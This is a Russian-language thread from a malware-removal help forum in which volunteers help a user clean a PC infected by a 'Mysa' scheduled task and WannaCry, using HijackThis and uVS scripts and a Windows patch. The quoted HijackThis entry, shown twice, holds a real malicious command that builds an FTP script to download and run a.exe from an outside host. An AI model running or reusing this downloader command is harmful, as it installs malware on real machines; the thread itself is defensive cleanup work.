Перейти к содержанию

Mysa и нагрузка системы


Katerina Rusenko

Рекомендуемые сообщения

Здравствуйте. Сегодня решили проверить  планировщик заданий, а там сидит Mysa. Первый раз видим такое, погуглили, вирус. Очень часто пропадает интернет, улетает много траффика, компьютер бывает очень жутко шумит и не всегда включается, причем (как мне сказали, вирус кушает много электроэнергии, напрягая видеокарту и процы) моя розетка стала брахлить даже))). незнаю, может это и не с этим связано, но телефон терь заряжается из неё как с юсб. Загрузка цп варьируется до 90% только лишь при открытом браузере. хотя нам и не мешало это особо, но теперь очень много непониманий. файлы прилагаю после скана логов. Очень ждем от вас помощи.

CollectionLog-2017.11.12-17.11.zip

Ссылка на комментарий
Поделиться на другие сайты

"Пофиксите" в HijackThis:

O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe

 

  1. Скачайте Universal Virus Sniffer (uVS)
  2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

    !!!Внимание.
    Если у вас установлены архиваторы
    WinRAR
    или
    7-Zip
    , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

  4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.

    !!! Обратите внимание
    , что утилиты необходимо запускать от имени Администратора. По умолчанию в
    Windows XP
    так и есть. В
    Windows Vista
    и
    Windows 7
    администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
    Запуск от имени Администратора
    , при необходимости укажите пароль администратора и нажмите
    "Да"
    .



Подробнее читайте в руководстве Как подготовить лог UVS.
 

Ссылка на комментарий
Поделиться на другие сайты

"Пофиксите" в HijackThis:

O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
  • Скачайте Universal Virus Sniffer (uVS)
  • Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  • Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

    !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

  • Дождитесь окончания работы программы и прикрепите лог к посту в теме.

    !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

Подробнее читайте в руководстве Как подготовить лог UVS.

 

https://ru.files.fm/u/bdgxwg2w

 

размер больше загружаемого, закинул на файлообменник

Ссылка на комментарий
Поделиться на другие сайты

Не надо заниматься оверковтингом, внизу есть поле для быстрого ответа.

 

 


размер больше загружаемого, закинул на файлообменник
можно было просто заархивировать

 

 


!!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

выполните скрипт в uVS

;uVS v4.0.10 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG
;---------command-block---------
delref WMI_.[FUCKYOUMM2_FILTER]
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE_64.DLL
delref F:\MINSTALL\MINST.EXE
delref F:\AUTORUN.EXE
apply

restart
что с проблемой?
Ссылка на комментарий
Поделиться на другие сайты

 

ну мы сделали скрипт, перезагрузился. мусы нет в планировщике. но её еще вчера после перезагрузки не было , после фикса хайджек пропал из планировщика. а как проверить, что его точно нет? загрузка цп как и была 3-40%

Изменено пользователем Katerina Rusenko
Ссылка на комментарий
Поделиться на другие сайты

Скачайте эту утилиту. Распакуйте и запустите.

Можете не дожидаться окончания сканирования, соберите новый лог uVS таким образом.

 

  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    ;uVS v4.0.5 [http://dsrt.dyndns.org]
    v400c
    
    adddir %SystemRoot%\
    crimg
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы.
  6. После этого в папке с программой будет создан образ автозапуска название, которого имеет формат "имя_компьютера_дата_сканирования". Прикрепите этот образ к следующему сообщению

    !!! Обратите внимание
    , что утилиты необходимо запускать от имени Администратора. По умолчанию в
    Windows XP
    так и есть. В
    Windows Vista
    и
    Windows 7
    администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
    Запуск от имени Администратора
    , при необходимости укажите пароль администратора и нажмите
    "Да"
    .


 

ЗЫ. не забудьте, потом заархивировать файл чтобы выложить на форум, если его uVS сам не заархивирует.
 

Ссылка на комментарий
Поделиться на другие сайты

запустили утилиту(она не зип) сразу экзешка. минут 25 сканила, так и не закончила, сразу после запуска её запустили сбор логов, все как написано, отключили брандмаузер и антивирус. стал собирать лог и на той же 25 минуте 404 синий экран. перезагрузка(молился чтоб винда не слетела) все что успел прочитать, что при сборе логов внизу много файлов не может найти

Ссылка на комментарий
Поделиться на другие сайты

Попробуйте ещё раз, если вдруг вылетит, то из безопасного режима.

 

 


перезагрузка(молился чтоб винда не слетела)
Это просто сбор информации, ничего не удаляет и не меняет. Так что винда из-за этого не слетит.
Ссылка на комментарий
Поделиться на другие сайты

еще вопрос, интернет же включенный должен быть для утилиты?

для AutorunsVTchecker обязательно, для остальных нет. Хотя для uVS может понадобиться при проверке цифровых подписей (если полезет запрашивать информацию по сертификату).

 

 

 

что из этого нужно выложить?

тот который свежее, то есть 2017-11-13_11-23-46-log только

 

 

не забудьте заархивировать файл чтобы выложить на форум

Ссылка на комментарий
Поделиться на другие сайты

Извиняюсь, не тот файл сказал прикрепить

 


что из этого нужно выложить?
на скрине вообще не видно нужного файла.

Нужный файл должен называться USER-PC_2017-11-13_10-55-43.TXT


+ посмотрите, у вас такой файл есть?

D:\11\SNUFF\UVS\pack\7za.exe
Ссылка на комментарий
Поделиться на другие сайты

он превышает в зипе даже. как разделить?) может на зеркало зип?


https://ru.files.fm/u/nnpdnpq6#_

 

извините за зеркалку. с телефоном не очень тут

Ссылка на комментарий
Поделиться на другие сайты

Скрипт попозже дам, а пока

 

Поставьте обновление http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212
И в будущем не забывайте своевременно обновляться.

Вчера или позавчера вы ещё успели шифровальщика WannaCry подхватить. Надеюсь он ничего не успел зашифровать.


+ обновите базы касперского и выполните проверку хотя бы диска C:\

Ссылка на комментарий
Поделиться на другие сайты

  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    ;uVS v4.0.10 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    BREG
    zoo %SystemRoot%\TASKSCHE.EXE
    bl 7F7CCAA16FB15EB1C7399D422F8363E8 3514368
    addsgn A7679BF0AA02C4A64BD4C64512881261848AFCF689AA7BF1A0C3C5BC50559D24704194DE5BBDAE92A2DD78F544E95C3EFC9FE82BD6D7FCD56D775BACCA56DB33 8 Trojan-Ransom.Win32.Wanna [Kaspersky] 7
    
    zoo %SystemRoot%\QERIUWJHRF
    chklst
    delvir
    
    czoo
    restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
  6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)

    Если архив отсутствует, то
    с паролем
    virus
    .

  7. Полученный архив отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.



 

+ сделайте свежие логи по правилам (Автологером).

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • sh0keqlow
      Автор sh0keqlow
      CollectionLog-2025.05.31-16.43.zip
      После скачивания некоторых пиратских ПО выросла нагрузка на ЦП, а именно от explorer.exe. Держится примерно на 18%, хотя проводник не включен.
    • Anov
      Автор Anov
      Единственные системы класса Security Governance, Risk & Compliance, которые я знаю, имеют довольно узкий функционал, потому что покрывают обычно только одну страну.
       
      Многие страны не приняли Будапештскую конвенцию по кибер преступлениям и развивают собственное регулирование национальных сегментов Интернета. В результате появились требования, например, к локализации хранения персональных данных с ограничениями на трансграничную передачу. Такое регулирование есть уже в России, Казахстане, Узбекистане.
       
      Появились даже сайты, которые пытаются отслеживать изменения в законах об обработке персональных данных различных стран.
       
      Однако понятно, что законами о персональных данных регулирование ИТ сферы едва ли может ограничиваться. Потому что та же локализация хранения требует дополнительного уточнения требований, связанных, например, с местными национальными стандартами шифрования данных и тд.
       
      Поскольку национальные власти различных стран требуют также сообщать о фактах утечки персональных данных в течение 1-3 дней, то сразу возникает вопрос: кому и куда писать в случае утечки? Едва ли контактные данные регуляторов являются частью любой SGRC системы, а хотелось бы..
       
      Мне любопытно, существуют ли какие-то решения класса SGRC для мультинациональных корпораций, бизнес-операции которых связаны не с одной конкретной, а множеством разных стран?
       
      Сразу добавлю, что меня не интересуют SGRC решения, предлагающие лишь удобство доступа к санкционным черным спискам (типа списка OFAC). Заранее благодарю за рекомендации.
       
       
       
    • Pomka.
      Автор Pomka.
      короче простым клубням тут не место ?
    • Victor_R
      Автор Victor_R
      Доброго дня всем! Версия Plus заканчивается пробный период. И вдруг Касперский начинает находить (раньше такого не видел в своей системе) и ругается на несовместимость с AdGuard. Предлагает настоятельно удалить его, но его НЕТ в системе! Смотрел и средствами Windows и есть Uninstall Tool. Но нигде нет Adguard.  Как реагировать на это? А точнее как исправить?
    • MiStr
      Автор MiStr
      То, над чем мы так долго работали; то, о чём вы не раз спрашивали; то, что теперь будет постоянно обновляться и публиковаться — текущий рейтинг фан-клубовцев. Наконец мы решили все организационные и технологические вопросы, получили и агрегировали данные по программам, участвующим в рейтинговой системе мотивации фан-клубовцев, и теперь готовы ежемесячно публиковать текущий рейтинг. Всё это для того, чтобы каждый фан-клубовец видел, на каком месте он находится в данный момент, мог оценить свои шансы на попадание в список приглашённых на празднование очередного дня рождения фан-клуба, зарядить себя мотивацией и с новыми силами продолжить участвовать в многочисленных программах, за активность в которых начисляются клабы.
       
      Рейтинг фан-клубовцев по состоянию на 03.02.2019 (Ник / количество клабов):
       
       
      Внимание! Опубликованные данные носят текущий информационный характер и не являются окончательным результатом. Публикация рейтинга не означает, что подсчитаны абсолютно все активности, в которых участвовал фан-клубовец до даты публикации рейтинга, поскольку информация об участии фан-клубовцев в программах поступает к нам с задержкой от нескольких дней до нескольких месяцев.
       
      Напоминаем, что согласно правилам рейтинговой системы, любые вопросы, связанные с начислением клабов, принимаются в течение 30 дней с момента обновления рейтинга участника. По истечении этого срока количество начисленных клабов не пересматривается. Поэтому если у вас возникли вопросы по начислению клабов, то отправьте письмо мне с копией Elly. В письме сообщите, какой размер вашего рейтинга должен быть и приложите соответствующие расчёты. Письма без конкретных расчётов или содержащие неконкретную информацию вида "Мне кажется, у меня должно быть немного больше" рассматриваться не будут.
×
×
  • Создать...